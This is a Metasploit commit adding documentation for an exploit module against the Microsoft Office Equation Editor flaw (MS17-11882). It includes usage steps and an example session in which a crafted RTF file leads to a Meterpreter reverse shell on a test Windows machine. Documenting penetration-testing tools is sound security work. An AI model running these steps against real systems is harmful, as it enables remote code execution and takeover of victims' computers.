Land rapid7#9226, Microsoft Office OLE object memory corruption

Author: wwebb-r7

documentation/modules/exploit/windows/fileformat/office_ms17_11882.md

@@ -0,0 +1,53 @@
+
+Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.
+
+## Vulnerable Application
+
+- Microsoft Office 2016
+- Microsoft Office 2013 Service Pack 1
+- Microsoft Office 2010 Service Pack 2
+- Microsoft Office 2007
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/windows/fileformat/office_ms17_11882`
+3. Do: `set PAYLOAD [PAYLOAD]`
+4. Do: `run`
+
+## Options
+### FILENAME
+Filename to output, and location to which should be written.
+
+
+## Example
+
+```
+msf > use exploit/windows/fileformat/office_ms17_11882
+msf exploit(office_ms17_11882) > set FILENAME msf.rtf
+FILENAME => /home/mumbai/file.rtf
+msf exploit(office_ms17_11882) > set LHOST ens3
+LHOST => ens3
+msf exploit(office_ms17_11882) > set LPORT 35116
+LPORT => 35116
+msf exploit(office_ms17_11882) > run
+[*] Using URL: http://0.0.0.0:8080/BUY0DYgc
+[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc
+[*] Server started.
+[*] 192.168.0.24     office_ms17_11882 - Handling initial request from 192.168.0.24
+[*] 192.168.0.24     office_ms17_11882 - Stage two requestd, sending
+[*] Sending stage (205379 bytes) to 192.168.0.24
+[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500
+sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : TEST-PC
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter >
+```